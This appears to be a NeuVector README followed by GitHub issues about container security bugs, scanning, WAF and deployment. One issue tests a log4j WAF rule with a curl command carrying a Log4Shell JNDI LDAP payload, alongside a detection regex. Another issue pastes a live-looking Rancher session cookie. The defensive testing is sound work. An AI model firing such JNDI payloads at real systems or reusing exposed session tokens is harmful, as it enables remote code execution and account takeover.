
neuvector's Introduction

NeuVector

The NeuVector Full Lifecycle Container Security Platform delivers the only cloud-native security solution with uncompromising end-to-end protection, from DevOps vulnerability scanning to automated run-time security, featuring a true Layer 7 container firewall.

A browsable version of the docs is available at https://open-docs.neuvector.com.

The images are on the NeuVector Docker Hub registry. Use the appropriate version tag for the manager, controller, and enforcer, and leave the tag as 'latest' for the scanner and updater. For example:

  • neuvector/manager:5.0.0
  • neuvector/controller:5.0.0
  • neuvector/enforcer:5.0.0
  • neuvector/scanner:latest
  • neuvector/updater:latest
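
To pre-pull these images, a minimal sketch (substitute the tag for your target release):

docker pull neuvector/manager:5.0.0
docker pull neuvector/controller:5.0.0
docker pull neuvector/enforcer:5.0.0
docker pull neuvector/scanner:latest
docker pull neuvector/updater:latest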

Note: Deploying from the Rancher Manager 2.6.5+ NeuVector chart pulls from the rancher-mirrored repo and deploys into the cattle-neuvector-system namespace.

License

Copyright © 2016-2022 NeuVector Inc. All Rights Reserved

Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.


neuvector's Issues

Cannot Import CRD with address selector

Environment
Platform: Kubernetes EKS
Kubernetes/Platform Version(s): v1.21.5-eks-bc4871b
NeuVector version: v5.0.0-preview.2

Describe the bug
Importing a CRD that includes an address selector under an NVClusterSecurityRule always fails with: Import failed : Group Policy Rule format error: Group Google-group with address criterion cannot have WAF policy. This happens both with a directly exported YAML file and with a modified one from which the waf key has been deleted.

To Reproduce

  1. Create a new group with an address=google.com criterion
  2. Export that group
  3. Import the newly exported file
  4. Error
  5. Remove waf key as directed
  6. Import modified file
  7. Error

Expected behavior
A freshly exported file should be importable without modification, or at least produce an error that matches the actual problem in the file.
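
For reference, a minimal sketch of the kind of rule involved (schema inferred from NeuVector's exported CRDs; treat exact field names as assumptions and diff against your own export):

kubectl apply -f - <<'EOF'
apiVersion: neuvector.com/v1
kind: NvClusterSecurityRule
metadata:
  name: google-group
spec:
  target:
    selector:
      name: Google-group
      criteria:
      - key: address
        op: =
        value: google.com
EOF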

[UI] Cannot change default password

The default password for the admin user is 5 characters: admin.
The default password profile requires a minimum of 6 characters.
When I try to change the default password from the manager, the UI "validates" the current password against the password profile, shows an error, and grays out the "Update Profile" button.

6 character(s) minimum.

Workaround: Update the password profile to accept 5 characters.

I'd recommend either changing the default password profile or disabling the form validation for the Current Password field in the Edit Profile view. I believe the form should not validate the current password before it is sent to the server.

process profile rules are not applied to labels

Environment
Platform: rancher
Kubernetes/Platform Version(s): 1.21

Description

When using the feature to apply rules to labels, they don't apply. For example, process rules consistently do nothing when applied to a label-based group; they only work on the direct service group.
The same issue seems to exist for network rules when a rule goes from a group to that same group. For example, you match your group of services with a single label and add an overall rule that they can communicate with each other on port xyz, yet security events still come up and NeuVector also starts blocking traffic, though oddly not immediately.

How to build the corresponding enforcer and controller containers?

Is your feature request related to a problem? Please describe.
How do I build the corresponding images from the Dockerfiles under the build directory in the source code, and what is 10.1.127.12:5000 in the Dockerfile?
Describe the solution you'd like
A straightforward Dockerfile that lets me quickly build the corresponding images, or a brief description of the existing Dockerfiles.
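
A hypothetical local-build sketch (the Dockerfile path and image name here are illustrative assumptions; 10.1.127.12:5000 looks like a private registry host used by NeuVector's internal CI, so replace or strip that prefix when building locally):

git clone https://github.com/neuvector/neuvector && cd neuvector
# pick one of the Dockerfiles under build/ (filename is an assumption)
docker build -t neuvector/enforcer:local -f build/Dockerfile.enforcer .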

false-positive with log4j CVE-2021-44228 vulnerability in Docker image

  1. Our team uses the Docker image opensearchproject/opensearch, tag 1.2.4.
    NeuVector found the CVE-2021-44228 (log4j-core) vulnerable package in the image at /usr/share/opensearch/plugins/opensearch-sql/druid-1.0.15.jar (impacted version 2.3, fixed version 2.15.0).

On MVNRepository I found this package (https://mvnrepository.com/artifact/com.alibaba/druid/1.0.15), and the log4j-core version it declares (2.3) is indeed in the vulnerable range for CVE-2021-44228.

After that we confirmed that our running container has this package inside it, and copied the druid JAR to the host machine.
We then unpacked the JAR into Java class files and found a pom.xml listing its dependencies.
The dependency list mentions the vulnerable log4j-core library, but there is no log4j binary of any kind inside the JAR itself.

Inside the container we found only a non-vulnerable log4j-core JAR (2.17.1).

That's why it seems to us that this is a false positive.
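
How we checked, roughly (a sketch of the steps above; the container name placeholder is ours):

# copy the flagged JAR out of the running container
docker cp <opensearch-container>:/usr/share/opensearch/plugins/opensearch-sql/druid-1.0.15.jar .
# no bundled log4j classes, only a pom.xml dependency reference
unzip -l druid-1.0.15.jar | grep -i log4j
unzip -p druid-1.0.15.jar META-INF/maven/com.alibaba/druid/pom.xml | grep -A2 log4j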

  2. In the same Docker image and running container, we found glibc-2.26-56.amzn2.x86_64, and according to ALAS2-2022-1736 this version is vulnerable to CVE-2021-33574.
    NeuVector didn't find it.

We use NeuVector v5.0.0-preview1.

network rule collection

I just read the source code of the agent. The network-control logic is tied to DP: according to the dp package, the network policy is written into dp_policy_handler, but the monitoring logic seems to be missing. I expected a local loop that inspects network traffic, so that when new traffic comes in or goes out, the monitor program matches it against dp_policy_handler and returns a deny action if nothing matches. Can someone elaborate on this for me? It confuses me a lot.
Here is the logic graph I drew from the code:
image

We found some problems with the time output

Environment
Platform: Kubernetes
Kubernetes/Platform Version(s): v1.21

Describe the bug
We found a problem with the time output: the dp process log lines are stamped 1970-01-01 (the Unix epoch) instead of the current time.

logs:
docker logs -f 5bce0104e740|more
2022-03-08T10:34:48|MON|/usr/local/bin/monitor starts, pid=4121173
net.core.somaxconn = 1024
net.unix.max_dgram_qlen = 64
Check TC kernel module ...
TC module located
2022-03-08T10:34:48|MON|Start dp, pid=4121245
2022-03-08T10:34:48|MON|Start agent, pid=4121246
1970-01-01T00:00:00|DEBU||dpi_dlp_init: enter
1970-01-01T00:00:00|DEBU||dpi_dlp_register_options: enter
1970-01-01T00:00:00|DEBU||net_run: enter

Rancher Continuous Delivery

Is your feature request related to a problem? Please describe.
This is maybe a request for documentation rather than a feature request.

Describe the solution you'd like
Rancher Continuous Delivery (Fleet) poses a few challenges for discovery and protection.
It would be nice to have documentation on how to handle Fleet deployments.
Every new commit to a gitrepo creates a new k8s job with a unique name.

Describe alternatives you've considered
I have tried to create a default group matching on the fleet-local and fleet-default namespaces and giving it process rules and network policies, but I cannot get it working 100%, especially when new services default to Protect mode; security events still occur.

Is there any architecture or design documentation for NeuVector?

Hello, I recently wanted to study the source code of NeuVector, but I could not find architecture or design documents that would help me understand it quickly. Is there a good document or code architecture diagram that can help me quickly understand the source code of the project? I would appreciate it.

Import of OWASP WAF Core Rules

Is your feature request related to a problem? Please describe.
The ability to import the complete set of OWASP WAF rules.

Describe the solution you'd like
A utility to take all or a subset of the OWASP Core WAF Rule Set and convert it into NeuVector WAF configurations.

Describe alternatives you've considered
Manually converting rules.

Additional context
OWASP CoreRuleSet: https://github.com/coreruleset/coreruleset

What's the role of Consul in NeuVector?

I can see a lot of Consul configuration in the source code of the Controller, and the logs show that the Controller initializes by setting up a Consul process. All I know is that Consul is an open-source project for service discovery and service registration. So what is the relationship between the Consul agent and the controller in NeuVector, and what purpose does NeuVector use Consul to achieve?

Security Events - Network activity source

Environment
Rancher RKE/Rancher 2.6.3 HA
nginx fronting Rancher HA cluster, haproxy ingress.
forwarded-for: false on haproxy configmap (use header from downstream proxy)

Describe the bug
Testing WAF rules with a log4j rule on Rancher:
regex: (?:${[^}]{0,4}${|${(?:jndi|ctx))

In Network Activity you will see traffic from the correct client IP.
In Security Events, the source is the public IP of one of the nodes, not the X-Forwarded-For address.

To Reproduce
Steps to reproduce the behavior:

  1. Create a WAF rule with regex shown
  2. Enable on nv.rancher.cattle-system group
  3. curl -I https:// -H 'X-Api-Token: ${jndi:ldap://192.168.3.2:1389/Basic/Command/Base64/JHtqbmRpOmxkYXA6Ly8=}'
  4. Observe that the source on the security event is the node address, while the client IP in Network Activity is the forwarded client IP address

Expected behavior
I would expect the info on the event to match Network Activity.
The downloaded packet (from the event) shows the correct X-Forwarded-For.
At the very least, show information about the client IP.

DLP sensor name and rule name

Hi,
It seems there are some limitations on sensor and rule name length:
sensor name: sensor.malicious.phpfile.upload
rule name: malicious.file.shell.exec.command

dpi_dlp_parse_opts_routine: Dlp rule((null)):(0) has invalid option(name : sensor.malicious.phpfile.upload_nvCtR.malicious.file.shell.exec.command)

If such limitations are imposed, the web GUI should also enforce them.
I am testing https://developer.ibm.com/patterns/protect-your-web-application-using-advanced-runtime-container-security/
and saving rules does not work due to the "invalid option name".

I'm running the 5.0.0 preview versions.

Controller is not available ...

The UI shows the error: Controller is not available ...
Connection attempt to neuvector-svc-controller.neuvector:10443 failed
class spray.can.Http$ConnectionAttemptFailedException

The services in the namespace:
neuvector-service-controller-fed-master NodePort 10.96.12.183 11443:32147/TCP 58s
neuvector-service-controller-fed-worker NodePort 10.106.96.75 10443:30012/TCP 58s
neuvector-service-rest ClusterIP 10.99.87.68 10443/TCP 15m
neuvector-service-webui NodePort 10.106.235.114 8443:30888/TCP 10m
neuvector-svc-admission-webhook ClusterIP 10.109.91.34 443/TCP 10m
neuvector-svc-controller ClusterIP 10.96.175.118 18300/TCP,18301/TCP,18301/UDP 10m
neuvector-svc-crd-webhook ClusterIP 10.108.210.198 443/TCP 10m
Please help me.

Misspelling

Under Policy > Admission Controls, CONFIGURATION is misspelled as CONFIGUATION (missing the R). The modal that pops up has the same misspelling.
Screen Shot 2022-03-30 at 15 28 16

View data stored in Consul

Hello, I want to inspect the data stored in Consul, but it turns out Consul is started internally. Is there any way for me to view the data it stores? It would be nice if there were a UI for it. Thank you very much!
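
One avenue to try, as a sketch: the controller's shutdown logs elsewhere in this tracker suggest the embedded Consul agent listens on 127.0.0.1:8500 inside the controller pod, so Consul's standard KV HTTP API may answer there (assuming curl exists in the image and access isn't restricted or the data encrypted):

# dump the Consul KV store from inside a controller pod (pod name is a placeholder)
kubectl exec -n neuvector <controller-pod> -- curl -s http://127.0.0.1:8500/v1/kv/?recurse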

Failed to get container

After using the Helm chart provided in Rancher and modifying the following values to use the 5.0.0 preview versions, all controller (3) and enforcer (1) pods won't start:
kubectl get all -n neuvector
NAME READY STATUS RESTARTS AGE
pod/neuvector-controller-pod-8576986c7f-2hk5v 0/1 CrashLoopBackOff 3 86s
pod/neuvector-controller-pod-8576986c7f-mmgtg 0/1 CrashLoopBackOff 3 85s
pod/neuvector-controller-pod-8576986c7f-xj5bx 0/1 CrashLoopBackOff 3 85s
pod/neuvector-enforcer-pod-kbhzj 0/1 CrashLoopBackOff 3 78s
pod/neuvector-manager-pod-798c7bb866-bsjrk 1/1 Running 0 67m
pod/neuvector-scanner-pod-5b94c54657-9bvmw 1/1 Running 0 67m
pod/neuvector-scanner-pod-5b94c54657-frfxw 1/1 Running 0 67m
pod/neuvector-scanner-pod-5b94c54657-wbtmp 1/1 Running 0 67m

NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
service/neuvector-service-webui ClusterIP 10.43.165.209 8443/TCP 67m
service/neuvector-svc-admission-webhook ClusterIP 10.43.100.58 443/TCP 67m
service/neuvector-svc-controller ClusterIP None 18300/TCP,18301/TCP,18301/UDP 67m

NAME DESIRED CURRENT READY UP-TO-DATE AVAILABLE NODE SELECTOR AGE
daemonset.apps/neuvector-enforcer-pod 1 1 0 1 0 67m

NAME READY UP-TO-DATE AVAILABLE AGE
deployment.apps/neuvector-controller-pod 0/3 3 0 67m
deployment.apps/neuvector-manager-pod 1/1 1 1 67m
deployment.apps/neuvector-scanner-pod 3/3 3 3 67m

NAME DESIRED CURRENT READY AGE
replicaset.apps/neuvector-controller-pod-8576986c7f 3 3 0 67m
replicaset.apps/neuvector-manager-pod-798c7bb866 1 1 1 67m
replicaset.apps/neuvector-scanner-pod-5b94c54657 3 3 3 67m

NAME SCHEDULE SUSPEND ACTIVE LAST SCHEDULE AGE
cronjob.batch/neuvector-updater-pod 0 0 * * * False 0 67m

Here is what I get from the enforcer logs:

2022-01-27T03:26:39.009|ERRO|AGT|container.(*containerdDriver).GetContainer: Failed to get container - error=container "751738dadbb7dc1e484dfbfed4fe9b9c222ca8c247b06d6bad51819bbc322c51" in namespace "k8s.io": not found

Thu, Jan 27 2022 4:26:39 am | 2022-01-27T03:26:39.009|ERRO|AGT|main.main: Failed to get local device information - error=not found
Thu, Jan 27 2022 4:26:39 am | github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs.init
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs/errors.go:41
Thu, Jan 27 2022 4:26:39 am | runtime.doInit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:5480
Thu, Jan 27 2022 4:26:39 am | runtime.doInit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:5475
Thu, Jan 27 2022 4:26:39 am | runtime.doInit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:5475
Thu, Jan 27 2022 4:26:39 am | runtime.doInit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:5475
Thu, Jan 27 2022 4:26:39 am | runtime.doInit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:5475
Thu, Jan 27 2022 4:26:39 am | runtime.doInit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:5475
Thu, Jan 27 2022 4:26:39 am | runtime.doInit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:5475
Thu, Jan 27 2022 4:26:39 am | runtime.main
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:190
Thu, Jan 27 2022 4:26:39 am | runtime.goexit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/asm_amd64.s:1373
Thu, Jan 27 2022 4:26:39 am | container "751738dadbb7dc1e484dfbfed4fe9b9c222ca8c247b06d6bad51819bbc322c51" in namespace "k8s.io"
Thu, Jan 27 2022 4:26:39 am | github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs.FromGRPC
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/errdefs/grpc.go:98
Thu, Jan 27 2022 4:26:39 am | github.com/neuvector/neuvector/vendor/github.com/containerd/containerd.(*remoteContainers).Get
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/containerstore.go:50
Thu, Jan 27 2022 4:26:39 am | github.com/neuvector/neuvector/vendor/github.com/containerd/containerd.(*Client).LoadContainer
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/vendor/github.com/containerd/containerd/client.go:248
Thu, Jan 27 2022 4:26:39 am | github.com/neuvector/neuvector/share/container.(*containerdDriver).GetContainer
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/share/container/containerd.go:294
Thu, Jan 27 2022 4:26:39 am | github.com/neuvector/neuvector/share/container.getDevice
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/share/container/common.go:191
Thu, Jan 27 2022 4:26:39 am | github.com/neuvector/neuvector/share/container.(*containerdDriver).GetDevice
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/share/container/containerd.go:121
Thu, Jan 27 2022 4:26:39 am | main.getLocalInfo
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/agent/agent.go:105
Thu, Jan 27 2022 4:26:39 am | main.main
Thu, Jan 27 2022 4:26:39 am | /go/src/github.com/neuvector/neuvector/agent/agent.go:361
Thu, Jan 27 2022 4:26:39 am | runtime.main
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/proc.go:203
Thu, Jan 27 2022 4:26:39 am | runtime.goexit
Thu, Jan 27 2022 4:26:39 am | /usr/local/go/src/runtime/asm_amd64.s:1373
Thu, Jan 27 2022 4:26:39 am | 2022-01-27T03:26:39|MON|Process agent exit status 254, pid=1624724
Thu, Jan 27 2022 4:26:39 am | 2022-01-27T03:26:39|MON|Process agent exit with non-recoverable return code. Monitor Exit!!
Thu, Jan 27 2022 4:26:39 am | 2022-01-27T03:26:39|MON|Kill dp with signal 15, pid=1624723
Thu, Jan 27 2022 4:26:39 am | 2022-01-27T03:26:38|DEBU|dp0|dp_data_thr: dp thread exits
Thu, Jan 27 2022 4:26:39 am | Leave the cluster
Thu, Jan 27 2022 4:26:39 am | Error leaving: Put http://127.0.0.1:8500/v1/agent/leave: dial tcp 127.0.0.1:8500: connect: connection refused
Thu, Jan 27 2022 4:26:39 am | 2022-01-27T03:26:39|MON|Clean up.

If I describe the pod, the container ID matches:

kubectl describe pod/neuvector-enforcer-pod-kbhzj -n neuvector
...
Controlled By: DaemonSet/neuvector-enforcer-pod
Containers:
neuvector-enforcer-pod:
Container ID: containerd://751738dadbb7dc1e484dfbfed4fe9b9c222ca8c247b06d6bad51819bbc322c51
Image: docker.io/neuvector/enforcer.preview:5.0.0-preview.1
Image ID: docker.io/neuvector/enforcer.preview@sha256:3997f1323b6a5f49a57156388b5de0261a048d49d202402d954d49af2f1d4a30
Port:
Host Port:
State: Waiting
Reason: CrashLoopBackOff
Last State: Terminated
Reason: Error
Exit Code: 254
Started: Thu, 27 Jan 2022 03:26:38 +0000
Finished: Thu, 27 Jan 2022 03:26:39 +0000
Ready: False
Restart Count: 7
Environment:
CLUSTER_JOIN_ADDR: neuvector-svc-controller.neuvector
CLUSTER_ADVERTISED_ADDR: (v1:status.podIP)
CLUSTER_BIND_ADDR: (v1:status.podIP)
Mounts:
/host/cgroup from cgroup-vol (ro)
/host/proc from proc-vol (ro)
/lib/modules from modules-vol (ro)
/var/run/containerd/containerd.sock from runtime-sock (ro)
/var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-5f9ps (ro)
...

Given the error, the agent seems to look for the container in the "k8s.io" containerd namespace, which I don't have.
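
A quick check on the node running the enforcer (a sketch using containerd's ctr CLI):

# list containerd namespaces, then look for the enforcer's container ID under k8s.io
ctr namespaces list
ctr --namespace k8s.io containers list | grep 751738dadbb7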

bug: resources can't allow themselves access (firewall)

Environment
Platform: rancher
Kubernetes/Platform Version(s): 1.21

Describe the bug

When you permit a statefulset to access a port on all other members of the same statefulset, the traffic is still raised as an exception by NeuVector. It is not possible to define working rules that target a resource's own sub-resources.

example

image

Scanner not working - ERRO|SCN|main.(*Tasker).Run: Done - error=exit status 2

Environment
Platform: Rancher v2.6.3
Kubernetes/Platform Version(s): RKE 2 (v1.21.9+rke2r1)
OS: SLES 15 SP3
NeuVector: 5.0.0-preview.2

Describe the bug
I installed NeuVector via Helm Chart and a private registry.
So far everything works quite well, and all features of NeuVector work as expected, with one exception:
The scanner is not working.

All pods are in the Running state and everything looks good so far:

kubectl get pods -n neuvector
NAME                                        READY   STATUS    RESTARTS   AGE
neuvector-controller-pod-787578844b-p4nlw   1/1     Running   0          4m25s
neuvector-controller-pod-787578844b-tbzk4   1/1     Running   0          4m25s
neuvector-controller-pod-787578844b-xqtzw   1/1     Running   0          4m25s
neuvector-enforcer-pod-6gckg                1/1     Running   0          4m25s
neuvector-enforcer-pod-bdrph                1/1     Running   0          4m25s
neuvector-enforcer-pod-tl5g8                1/1     Running   0          4m25s
neuvector-manager-pod-6cf449ccdb-rrjxd      1/1     Running   0          4m25s
neuvector-scanner-pod-6487bdcb78-mfnl8      1/1     Running   0          4m25s
neuvector-scanner-pod-6487bdcb78-t5hrz      1/1     Running   0          4m25s
neuvector-scanner-pod-6487bdcb78-tkgmc      1/1     Running   0          4m25s

But when we try to start a scan, it fails.

The scan log output looks like this:

2022-03-11T13:07:37.553|DEBU|SCN|main.(*rpcService).ScanAppPackage: - Packages=[AppName:"kubernetes" ModuleName:"kubernetes" Version:"1.21.9+rke2r1" FileName:"kubernetes" ]
2022-03-11T13:07:37.554|DEBU|SCN|main.(*Tasker).Run:
2022-03-11T13:07:37.555|DEBU|SCN|main.(*Tasker).Run: - args=[-t pkg -i /tmp/2a97687a-cedc-42bb-9df5-872adbf9334e_i.json -o /tmp/2a97687a-cedc-42bb-9df5-872adbf9334e_o.json] cmd=/usr/local/bin/scannerTask wpath=/tmp/images/2a97687a-cedc-42bb-9df5-872adbf9334e
2022-03-11T13:07:37.58 |INFO|SCT|system.NewSystemTools: cgroup v1
2022-03-11T13:07:37.58 |DEBU|SCT|main.main: - imageWorkingPath=/tmp/images/2a97687a-cedc-42bb-9df5-872adbf9334e
---usage: scannerTask [OPTIONS]
  -i string
    	input json name (default "input.json")
  -o string
    	output json name (default "result.json")
  -t string
    	scan type: reg, pkg, dat or awl (Required)
  -u string
    	Container socket URL
2022-03-11T13:07:37.583|ERRO|SCN|main.(*Tasker).Run: Done - error=exit status 2
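
The exit status 2 together with the usage text suggests scannerTask is rejecting its arguments. One way to dig deeper, as a sketch (the input JSON path is a placeholder; the task needs a valid -i file to run):

# rerun the task by hand inside a scanner pod with the flags from the log
kubectl exec -n neuvector deploy/neuvector-scanner-pod -- \
  /usr/local/bin/scannerTask -t pkg -i /tmp/input.json -o /tmp/result.json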

To Reproduce
Steps to reproduce the behavior:

  1. Install NeuVector
  2. Start a scan (e.g. of an OCI image or the K8s cluster)

Expected behavior

  • A clear log / message pointing to the root cause.

Updater cannot update successfully

Hi,
I'm trying to update the NeuVector CVE database but it never succeeds; the updater cron job reports
ImagePullBackOff and ErrImagePull.
The events are as follows:
Events:
Type Reason Age From Message
Normal Scheduled 2m Successfully assigned neuvector/neuvector-updater-pod-1645902120-fsrzj to node01.localdomain
Warning Failed 119s kubelet, node01.localdomain Failed to pull image "registry.neuvector.com/updater": rpc error: code = Unknown desc = Error response from daemon: Get https://registry.neuvector.com/v2/: read tcp 192.168.2.161:58592->34.120.39.14:443: read: connection reset by peer
Warning Failed 104s kubelet, node01.localdomain Failed to pull image "registry.neuvector.com/updater": rpc error: code = Unknown desc = Error response from daemon: Get https://registry.neuvector.com/v2/: read tcp 192.168.2.161:58650->34.120.39.14:443: read: connection reset by peer
Warning Failed 69s kubelet, node01.localdomain Failed to pull image "registry.neuvector.com/updater": rpc error: code = Unknown desc = Error response from daemon: Get https://registry.neuvector.com/v2/updater/manifests/latest: Get https://registry.neuvector.com/_token?scope=repository%3Aupdater%3Apull: read tcp 192.168.2.161:58746->34.120.39.14:443: read: connection reset by peer
Normal Pulling 23s (x4 over 119s) kubelet, node01.localdomain Pulling image "registry.neuvector.com/updater"
Warning Failed 21s (x4 over 119s) kubelet, node01.localdomain Error: ErrImagePull
Warning Failed 21s kubelet, node01.localdomain Failed to pull image "registry.neuvector.com/updater": rpc error: code = Unknown desc = Error response from daemon: Get https://registry.neuvector.com/v2/updater/manifests/latest: denied: Permission "artifactregistry.repositories.downloadArtifacts" denied on resource "projects/neuvector-cloud-live-292322/locations/us/repositories/neuvector-us" (or it may not exist)
Normal BackOff 10s (x6 over 118s) kubelet, node01.localdomain Back-off pulling image "registry.neuvector.com/updater"
Warning Failed 10s (x6 over 118s) kubelet, node01.localdomain Error: ImagePullBackOff
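
Two isolation steps worth trying (sketches): reproduce the pull directly on a node to rule out the kubelet, and, since the README above notes the open-source images are on Docker Hub, point the updater CronJob at neuvector/updater:latest instead of registry.neuvector.com:

# on the node, outside Kubernetes
docker pull registry.neuvector.com/updater:latest
# Docker Hub alternative
docker pull neuvector/updater:latest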

Cilium support

Hi, I'm trying out NeuVector with different types of CNIs.
Canal/Calico works fine, but I cannot get it to work using Cilium.
After discovery, if I put a container in Protect mode, traffic is blocked even though the network rules are correct.
How could I debug this issue? Maybe it is eBPF-related?

Usage of the agent

I have read the docs about NeuVector and the architecture of the whole system, but according to the source code, besides the scanner, controller, and updater there is another component named agent that is not mentioned in the docs. I wonder if someone can explain it or point me to some reference material about this part. I'd appreciate it.

ingress and x-forwarded-headers

Hi,
I'm working on verifying the usage of X-Forwarded-For headers and traffic policy.
Current setup:
purelb loadbalancer
nginx ingress: externaltrafficpolicy: Cluster
workload: ealen/echo-server
Neuvector 5.0.0.preview
RKE2 (v1.21.9+rke2r1)
calico (VXLANCrossSubnet)

As I understand the documentation, NeuVector should honor X-Forwarded-For headers, and the traffic should appear as coming from external.
However, the traffic is shown as coming from the ingress pod.
The headers are added by nginx-ingress before the request reaches the pod.

I can do further debugging if you can guide me to any cli commands.

br hw

Edit:
Checking the CLI with show conversation:
Host -> echo-server: xff_entry: True
Ingress -> echo-server: xff_entry: None

Can't load dashboard: Request is missing required HTTP header 'Token'

Hi!

I'm running the preview version of NeuVector (5.0.0), deployed on an RKE2 cluster via the Rancher 2.6 charts (with modifications). All pods and services are running correctly with no errors.

I access the dashboard by clicking the service, log in with the default credentials, and then read and accept the EULA. The dashboard almost fully loads, and at the end it throws the following error (it's the only thing I can see):

Request is missing required HTTP header 'Token'

Console log:

DevTools failed to load source map: Could not load content for https://REDACTED_HOSTNAME/api/v1/namespaces/neuvector/services/https:neuvector-service-webui:8443/proxy/vendor-e8113a58f6b1c806aaf277cb2565c93e.map: HTTP error: status code 400, net::ERR_HTTP_RESPONSE_CODE_FAILURE

Uncaught SyntaxError: Unexpected token < in JSON at position 0

GET https://REDACTED_HOSTNAME/api/v1/namespaces/neuvector/services/https:neuvector-service-webui:8443/proxy/index.html/app/dashboard?v=7483daf7b7 400

The request that failed (there are around 10 retries of the same URL), copied as curl from the browser network capture:

curl "https://REDACTED_HOSTNAME/api/v1/namespaces/neuvector/services/https:neuvector-service-webui:8443/proxy/index.html/app/dashboard?v=7483daf7b7" ^ -H "authority: REDACTED_HOSTNAME" ^ -H "sec-ch-ua: ^\^" Not;A Brand^\^";v=^\^"99^\^", ^\^"Google Chrome^\^";v=^\^"97^\^", ^\^"Chromium^\^";v=^\^"97^\^"" ^ -H "sec-ch-ua-mobile: ?0" ^ -H "sec-ch-ua-platform: ^\^"Windows^\^"" ^ -H "upgrade-insecure-requests: 1" ^ -H "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36" ^ -H "accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9" ^ -H "sec-fetch-site: same-origin" ^ -H "sec-fetch-mode: navigate" ^ -H "sec-fetch-dest: document" ^ -H "referer: https://REDACTED_HOSTNAME/api/v1/namespaces/neuvector/services/https:neuvector-service-webui:8443/proxy/index.html?v=7483daf7b7" ^ -H "accept-language: en-US,en;q=0.9" ^ -H "cookie: R_PCS=light; R_LOCALE=en-us; R_THEME=dark; R_REDIRECTED=true; CSRF=d75778f767; R_SESS=token-xlzjh:kr27wfwr76qlmz2ncgh5d6fszgh47l2mj72fjv2wmzngwq579dpkz7" ^ --compressed

The response is a 400 Bad Request with these headers:

cache-control: no-cache, private
content-length: 47
content-type: text/plain; charset=UTF-8
date: Thu, 03 Feb 2022 16:59:39 GMT
strict-transport-security: max-age=15724800; includeSubDomains
x-api-cattle-auth: true
x-content-type-options: nosniff

I can't seem to get the ingress controller working to test it via ingress:

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  annotations:
    field.cattle.io/publicEndpoints: '[{"addresses":["REDACTED_IP"],"port":443,"protocol":"HTTPS","serviceName":"neuvector:neuvector-service-webui","ingressName":"neuvector:nv-web-ui","hostname":"REDACTED_HOSTNAME","path":"/","allNodes":false}]'
  creationTimestamp: "2022-02-03T16:28:37Z"
  generation: 4
  managedFields:
  - apiVersion: networking.k8s.io/v1
    fieldsType: FieldsV1
    fieldsV1:
      f:spec:
        f:rules: {}
        f:tls: {}
    manager: rancher
    operation: Update
    time: "2022-02-03T16:28:37Z"
  - apiVersion: networking.k8s.io/v1
    fieldsType: FieldsV1
    fieldsV1:
      f:status:
        f:loadBalancer:
          f:ingress: {}
    manager: nginx-ingress-controller
    operation: Update
    time: "2022-02-03T16:29:21Z"
  - apiVersion: extensions/v1beta1
    fieldsType: FieldsV1
    fieldsV1:
      f:metadata:
        f:annotations:
          .: {}
          f:field.cattle.io/publicEndpoints: {}
    manager: rancher
    operation: Update
    time: "2022-02-03T16:29:21Z"
  name: nv-web-ui
  namespace: neuvector
  resourceVersion: "19950782"
  uid: 2b408b8d-f18e-4896-9bc0-4bd051ddb160
spec:
  rules:
  - host: REDACTED_HOST
    http:
      paths:
      - backend:
          service:
            name: neuvector-service-webui
            port:
              number: 8443
        path: /
        pathType: Prefix
  tls:
  - hosts:
    - REDACTED_HOST
    secretName: nv-web-cert
status:
  loadBalancer:
    ingress:
    - ip: REDACTED_IP

Any clues on what might be wrong?
Thanks!

Neuvector appears to run under minikube but not KinD

Environment
Platform: KinD on Podman (darwin/arm64)
Kubernetes/Platform Version(s):

Podman 4.0.2
kind v0.12.0 go1.17.6 darwin/arm64
Kubernetes 1.23.4

Describe the bug

Neuvector fails to start with the following errors:

2022-04-02T00:28:06.362|INFO|AGT|main.main: START - version=v5.0.0-preview.3
2022-04-02T00:28:06.366|INFO|AGT|main.main: - bind=10.240.162.144
2022-04-02T00:28:06.376|INFO|AGT|system.NewSystemTools: cgroup v2
2022-04-02T00:28:06.376|INFO|AGT|container.Connect: - endpoint=
2022-04-02T00:28:06.376|ERRO|AGT|main.main: Failed to initialize - error=Unknown container runtime

